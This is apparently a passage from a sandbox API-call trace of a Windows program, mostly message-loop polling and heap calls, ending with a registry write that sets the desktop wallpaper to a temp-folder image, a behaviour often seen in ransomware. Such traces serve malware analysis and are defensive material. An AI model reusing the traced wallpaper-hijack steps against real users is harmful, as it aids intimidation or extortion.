0 [0287.462] Sleep (dwMilliseconds=0xa) [0287.477] timeGetTime () returned 0x47e71 [0287.477] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.477] Sleep (dwMilliseconds=0xa) [0287.493] timeGetTime () returned 0x47e81 [0287.493] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.493] Sleep (dwMilliseconds=0xa) [0287.508] timeGetTime () returned 0x47e90 [0287.508] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.509] Sleep (dwMilliseconds=0xa) [0287.525] timeGetTime () returned 0x47ea0 [0287.525] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.525] Sleep (dwMilliseconds=0xa) [0287.540] timeGetTime () returned 0x47eaf [0287.540] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.543] Sleep (dwMilliseconds=0xa) [0287.555] timeGetTime () returned 0x47ebf [0287.555] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.555] Sleep (dwMilliseconds=0xa) [0287.571] timeGetTime () returned 0x47ecf [0287.571] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.571] Sleep (dwMilliseconds=0xa) [0287.586] timeGetTime () returned 0x47ede [0287.586] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.586] Sleep (dwMilliseconds=0xa) [0287.602] timeGetTime () returned 0x47eee [0287.602] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.602] Sleep (dwMilliseconds=0xa) [0287.618] timeGetTime () returned 0x47efd [0287.618] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.618] Sleep (dwMilliseconds=0xa) [0287.634] timeGetTime () returned 0x47f0d [0287.634] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.634] Sleep (dwMilliseconds=0xa) [0287.649] timeGetTime () returned 0x47f1d [0287.649] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.649] Sleep (dwMilliseconds=0xa) [0287.664] timeGetTime () returned 0x47f2c [0287.665] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.665] Sleep (dwMilliseconds=0xa) [0287.680] timeGetTime () returned 0x47f3c [0287.680] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.680] Sleep (dwMilliseconds=0xa) [0287.696] timeGetTime () returned 0x47f4b [0287.696] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.696] Sleep (dwMilliseconds=0xa) [0287.711] timeGetTime () returned 0x47f5b [0287.711] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.711] Sleep (dwMilliseconds=0xa) [0287.727] timeGetTime () returned 0x47f6b [0287.727] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.727] Sleep (dwMilliseconds=0xa) [0287.743] timeGetTime () returned 0x47f7a [0287.743] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.743] Sleep (dwMilliseconds=0xa) [0287.758] timeGetTime () returned 0x47f8a [0287.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.758] Sleep (dwMilliseconds=0xa) [0287.774] timeGetTime () returned 0x47f99 [0287.774] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.774] Sleep (dwMilliseconds=0xa) [0287.789] timeGetTime () returned 0x47fa9 [0287.789] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.790] Sleep (dwMilliseconds=0xa) [0287.805] timeGetTime () returned 0x47fb9 [0287.805] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.805] Sleep (dwMilliseconds=0xa) [0287.820] timeGetTime () returned 0x47fc8 [0287.820] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.821] Sleep (dwMilliseconds=0xa) [0287.836] timeGetTime () returned 0x47fd8 [0287.836] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.836] Sleep (dwMilliseconds=0xa) [0287.852] timeGetTime () returned 0x47fe7 [0287.852] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.852] Sleep (dwMilliseconds=0xa) [0287.867] timeGetTime () returned 0x47ff7 [0287.867] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.867] Sleep (dwMilliseconds=0xa) [0287.883] timeGetTime () returned 0x48007 [0287.883] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.883] Sleep (dwMilliseconds=0xa) [0287.898] timeGetTime () returned 0x48016 [0287.899] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.899] Sleep (dwMilliseconds=0xa) [0287.914] timeGetTime () returned 0x48026 [0287.914] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.914] Sleep (dwMilliseconds=0xa) [0287.930] timeGetTime () returned 0x48035 [0287.930] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.930] Sleep (dwMilliseconds=0xa) [0287.946] timeGetTime () returned 0x48045 [0287.946] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.946] Sleep (dwMilliseconds=0xa) [0287.965] timeGetTime () returned 0x48055 [0287.965] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.966] Sleep (dwMilliseconds=0xa) [0287.977] timeGetTime () returned 0x48064 [0287.977] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.977] Sleep (dwMilliseconds=0xa) [0287.993] timeGetTime () returned 0x48074 [0287.994] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.994] Sleep (dwMilliseconds=0xa) [0288.010] timeGetTime () returned 0x48083 [0288.010] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.010] Sleep (dwMilliseconds=0xa) [0288.023] timeGetTime () returned 0x48093 [0288.023] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.023] Sleep (dwMilliseconds=0xa) [0288.039] timeGetTime () returned 0x480a3 [0288.039] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.039] Sleep (dwMilliseconds=0xa) [0288.054] timeGetTime () returned 0x480b2 [0288.054] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.054] Sleep (dwMilliseconds=0xa) [0288.070] timeGetTime () returned 0x480c2 [0288.070] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.070] Sleep (dwMilliseconds=0xa) [0288.086] timeGetTime () returned 0x480d1 [0288.086] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.086] Sleep (dwMilliseconds=0xa) [0288.101] timeGetTime () returned 0x480e1 [0288.101] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.101] Sleep (dwMilliseconds=0xa) [0288.117] timeGetTime () returned 0x480f1 [0288.117] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.117] Sleep (dwMilliseconds=0xa) [0288.132] timeGetTime () returned 0x48100 [0288.132] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0288.133] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0288.133] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0288.133] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0288.133] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0288.133] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.133] Sleep (dwMilliseconds=0xa) [0288.148] timeGetTime () returned 0x48110 [0288.148] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.148] Sleep (dwMilliseconds=0xa) [0288.164] timeGetTime () returned 0x4811f [0288.164] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.164] Sleep (dwMilliseconds=0xa) [0288.179] timeGetTime () returned 0x4812f [0288.179] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.179] Sleep (dwMilliseconds=0xa) [0288.195] timeGetTime () returned 0x4813f [0288.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0288.195] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0288.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0288.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0288.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0288.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0288.196] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0288.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0288.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0288.197] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0288.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0288.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0288.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0288.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0288.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0288.199] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0288.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0288.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0288.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0288.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0288.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0288.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0288.199] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0288.199] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0288.200] RegCloseKey (hKey=0x294) returned 0x0 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0288.201] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0288.201] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0288.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0288.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0288.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0288.202] HeapFree (in: 